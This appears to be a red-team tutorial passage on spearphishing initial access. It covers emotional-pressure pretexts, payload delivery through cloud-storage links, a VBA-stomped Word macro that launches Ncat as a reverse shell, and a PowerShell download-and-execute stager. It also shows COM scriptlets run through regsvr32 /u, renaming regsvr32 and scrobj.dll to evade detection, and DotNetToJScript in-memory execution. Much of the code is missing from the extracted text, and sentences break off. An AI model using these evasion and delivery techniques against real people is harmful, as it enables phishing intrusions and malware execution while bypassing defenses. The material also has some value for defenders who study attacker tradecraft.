The clever application of social engineering tactics will assist in both
bypassing technologically difficult to overcome barriers to entry, as well to aid in
access overall. Using methods that elicit an emotional response,
such as the threat that money will be deducted from the users credit card or bank
and urging the user to "act now" or lose money. Likewise, if the target is presented
confidential information or information not
meant for them, they may be urged to click through warnings. In general, when an
response is elicited, common sense and safe practice may be dropped by the target. It
may be
simpler than that, and the target may only
have to be convinced to enable macros in an office document for a mundane reason such as
sign the document. One of the best social engineering attempts I have seen was a faked
social media account, set up to mimic a person
working in the targets same industry, the target received a direct message saying "Have
seen what people are saying about you on these professional forums? Yes, here is a link
the forum, log in with your email address
and password." The target was suspicious and avoided the trap, but this is a good
example of
the clever application of social engineering eliciting an emotional response and urging
target to "act now".
Spearphishing with Malicious Files - Basics
Attack vectors refer to the means of payload delivery, ie: the
spearphishing methodology (.LNK file, malicious MS Office Word or Excel macros), while
payload refers to the actual code or script that will run (usually as a dropper
this stage of the engagement, can also be part of a file-less attack through process
hollowing), such as a COM object, C# delivery,
and XSL stylesheet, and many, many more. The basic VBA techniques we will demonstrate
now are easily detected by
AV and EDR, we will use them to illustrate the basics of how one type of script can be
used to download or open
another script. For example, the VBA command "Shell" can be used to execute a powershell
script that will use UrlDownload to
download a program from somewhere else, in the following example we will use a simple
VBA macro in a word document to execute Ncat.exe
as a reverse shell. Remember that social engineering is required to push a user to
interact with a document and enable macros, remember that AV
will automatically be triggered as an alert to any Auto_Open or Auto_run of any
macro inside a document, given the long
history of malicious macros being used as an attack vector, this is to be expected.
One way of defeating spam filters is to deliver the payload via a DropBox or OneDrive
To ensure the file is immediately downloaded and preview is bypassed, make sure the end
of the link is changed from "dl=0" to "dl=1" (this technique works the same using links
from OneDrive, DropBox, and Google Cloud) - ie: becomes
Simple VBA Word Macro - Obfuscated with VBA Stomp ADB (adaptive
document builder) - And
Opening up Ncat as a Reverse
We will use the VBA stomp adaptive document builder tool to obfuscate the
embedded VBA,
tool available at:
ADB GitHub
We are creating a VBA stager that will deliver a payload once the target
opens up the
Word or Excel document and enables macros. Create a macro inside a word document and use
a simple set of Powershell commands
inside the VBA command "Shell" to download and execute a powershell script: Shell
"powershell.exe -WindowStyle -Hidden -c iex ((NewObject
Remember to use double backslashes in your filepath when modifying the python script
(single backslashes are interpreted as a newline character).
In this command we use the New-Object PowerShell cmdlet to create a .NET web object
and make the use of the DownloadString function from the
Net.WebClient class to download our malicious PowerShell script,
and download and execute the content.
Example of a simple powershell script that runs procmon and exports the
results to an XML document, this I have embedded
inside the VBA stager to be downloaded and executed when the malicious document is
Install the requirements for VBA stomper
I run the command and successfully stomp the document.
Even with defender disabled, the stomped document is still recognized, and
my Ncat listener remains listening without a connection.
This is a good example of how a known tool is immediately detected. All the
commonly available
tools are known and will be immediately detected. Thier code will have to be altered,
and in an upcoming section, we will write
a custom HTTP malware that will connect using Windows API's, and communicate to a
Caldera-C2: All of this will be undetected and
illustrate the fact that to be successful, all tools and malware will have to be custom
Spearphishing with Malicious Files - Advanced: COM Objects
COM (component object model) objects, also known as OLE-2 (object linking
and embedding - version 2)
is an API mechanism that allows MS Office applications to communicate and interact with
each other,for example; a powershell
script within an Excel document, or a word document embedded within a Powerpoint
COM scriptlets can be created, and will
allow you to execute any script that you choose (pure script - Javascript or VBS), all
in memory.
COM is considered obsolete with the
existence of .NET and WCF (Windows communication framework), but is still allowed for
backwards compatibility.
- COM scriptlets are excellent stagers for additional malware payloads
- COM scriptlets can be embedded inside an LNK file
- They are easily detected, especially for commandline signatures on regsvr32.exe or
- These files will have to be copied to %temp% or %appdata% with a different name to
bypass detections
- "Fire and forget" - Once the script is running in memory the downloader can be
removed to re
duce chances of detection
- Scriptlets can easily be executed using Windows applications -regsvr32.exe,
rundll32.exe -
This can help to bypass many defenses
- Can be executed using "Shell" in VBA
COM Scriptlet Example:
COM scriptlet with Javascript embedded. VBS may also be used.
Creating a C# Backdoor from a COM Object using DotNetToJscript
DotNetToJScript GitHub
We will take a powershell.cs script (essentially a powershell code that runs
from C#), we will compile this
file into a .dll file (powershell as a .dll) we will then load the dll inside our
Javascript code
that is inside our COM object, and we execute of this through regsvr32.
We will be starting with a powershell program written in C# - pshell.cs -
main loop of the function displayed below:
I have modified the code to use the main RunPSCommand to open Notepad in
view as an example of how the command can be used to execute commands or an operation.
The RunPSCommand function uses the System.Management.Automation.dll -
essentially the Windows Powershell we
are all familiar with - included as a library in
the header of pshell.cs file.
We will be using XAMMP to host an Apache server on our localhost at port 80
or 443 to facilitate
this task. At a later
stage we will connect XAMMP to our Caldera-C2.
Use the following command to compile the pshell.cs code into a dll:
Inside XAMMP control panel open "Explorer", inside Explorer, change into the
"Htdocs" directory, this is where the
internet files are stored.
Test by typing "/file.sct" into your browser after localhost, the scriptlet
should be
Use the following command to download the COM scriptlet and execute its code
in memory. Interestingly,
you will notice that we use the "u" for uninstall, as to install in regsvr32 requires
administrator privileges, but
to uninstall does not, and will keep executing the same code as it appears in the
scriptlet during uninstall.
As seen above, detection occurs in the command line, copy regsvr32 and
into %TEMP% and rename them. In the following set of snapshots you will see how
I have copied and renamed regsvr32 and scrobj.dll into %TEMP% and renamed them to
sophia.exe and alexis.dll respectively. Using https is a helpful to bypass IDS or IPS in
settings, for example where SSL strip and other advanced endpoint detection methods are
not in use.
Success in the command line from %TEMP%.
Next we use the following command to compile pshell.cs into a dll using
csc.exe (C# compiler).
We will be using DotNetToJScript DotNetToJScriptto compile a
Javascript file from the DLL using the following command
DotNetToJScript to uses a .NET feature called serialization in C# to do
this, see the MSDN documents for serialization
here MSDN
As seen in the screenshot below, we now have pshell.js file compiled.
When we open the pshell.js file in our editor, we see the serialized C#
object converted into assembly and encoded in base64. It then converts the code from
base64 into
binary data. It will then de-serialize this into code that can be run.
This part of the code creates an instance of the main class, 'TestClass'
When we look at our pshell.cs code, we see that the main function Execute()
inside the public class TestClass()
Use cscript.exe to test the script, Notepad should open
This code can now be copied and pasted inside your COM scriptlet (the entire
code from pshell.js)
We now have a Javascript application that runs C# code, all inside a COM
scriptlet. Copy and past the file inside htdocs in XAMMP Explorer.
Test from the server and also from the command line.
This concludes our illustration of how much can be done using COM scriptlets.